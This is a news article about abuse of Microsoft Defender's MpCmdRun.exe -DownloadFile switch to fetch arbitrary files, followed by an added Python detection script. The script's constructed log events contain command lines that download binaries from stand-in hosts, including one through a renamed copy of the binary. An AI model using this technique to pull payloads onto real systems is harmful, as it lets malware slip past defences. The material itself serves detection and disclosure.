DownloadFile: the command used in Defender and the system console
When it comes to keeping our computer protected against external threats, we have been hearing for some time about the benefits of Microsoft Defender, the antivirus protection that comes integrated with Windows 10 and spares us from having to install a third-party solution. We can still install another antivirus, but it is not mandatory.
Microsoft Defender works really well, but it is not perfect. That becomes clear when we see how the tool designed to protect our computer can make it easier to infect, thanks to a single command. Seeing is believing.
DownloadFile
Our colleagues at BleepingComputer have reported the news. The cause is a simple command: DownloadFile. It lets us use Microsoft Defender from the command console to download almost any type of content.
It was the security researcher Mohammad Askar who discovered that the command console can be used this way to download any file and, of course, malware. He announced it on his Twitter account.
In this way Microsoft Defender leaves a door wide open which, if the user wishes, can become a major threat without the program taking action to prevent the fire.
A bug, if it can be called that, present since version 4.18.2007.9 or 4.18.2009.9; which one is still unclear. Using the DownloadFile command, Askar managed to download malware onto his computer with impunity.
Microsoft is aware of this feature, as it was recently added to Windows Defender. In fact, it is described on the support page that lists the available Windows Defender commands and how they work.
Just open the command console and the system will not ask anything. Enter the address of the content to download and we will have it on our computer.
This security hole allows, as cited in Bleeping Computer, a local user to use the Microsoft Antimalware Service command line utility (MpCmdRun.exe) to download a file from a remote location using the command:
On the bright side, Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but the question is whether other antiviruses will be able to do the same.
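For defenders who do not want to rely on antivirus detection of the downloaded file alone, the download itself can be flagged from process-creation logs. The following is an added example, not code from the original article or from Microsoft: it assumes events shaped like Sysmon Event ID 1 (fields `Image`, `OriginalFileName`, `CommandLine`) and the `-url` / `-path` argument names of MpCmdRun.exe, which the article does not list; all sample events are constructed.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# Hosts, URLs and paths are invented for the example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'MpCmdRun.exe -DownloadFile -url https://files.example.invalid/a.bin -path C:\Users\Public\a.bin'},
    {"Image": r"C:\Users\Public\updater.exe",  # renamed copy of the binary
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'updater.exe -downloadfile -URL "https://files.example.invalid/b.bin" -Path "C:\Temp\b.bin"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\notes\DownloadFile.txt"},
]

BINARY = "mpcmdrun.exe"
SWITCH = re.compile(r"(?<!\S)-downloadfile(?!\S)", re.IGNORECASE)
# Value of a named argument, quoted or bare.
ARG = r'(?<!\S)-{name}\s+(?:"([^"]*)"|(\S+))'


def _arg(cmdline, name):
    m = re.search(ARG.format(name=name), cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def find_defender_downloads(events):
    """Return one finding per event where MpCmdRun.exe ran with -DownloadFile."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        image_name = image.rsplit("\\", 1)[-1].lower()
        original = ev.get("OriginalFileName", "").lower()
        cmdline = ev.get("CommandLine", "")
        # Match on the on-disk name or the PE version-info name, so a
        # renamed copy of the binary is still caught.
        if BINARY not in (image_name, original) or not SWITCH.search(cmdline):
            continue
        findings.append({
            "image": image,
            "renamed": image_name != BINARY,
            "url": _arg(cmdline, "url"),
            "path": _arg(cmdline, "path"),
        })
    return findings
```

The same match (binary name or original file name, plus the `-DownloadFile` switch) carries over to an EDR or SIEM query; the `renamed` flag separates a stock invocation from a copied binary.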
Presumably this bug, which has to be called something, will be corrected shortly with an update. Although its existence does not in itself make our computer unsafe (after all, it requires our action), it can be dangerous in malicious hands.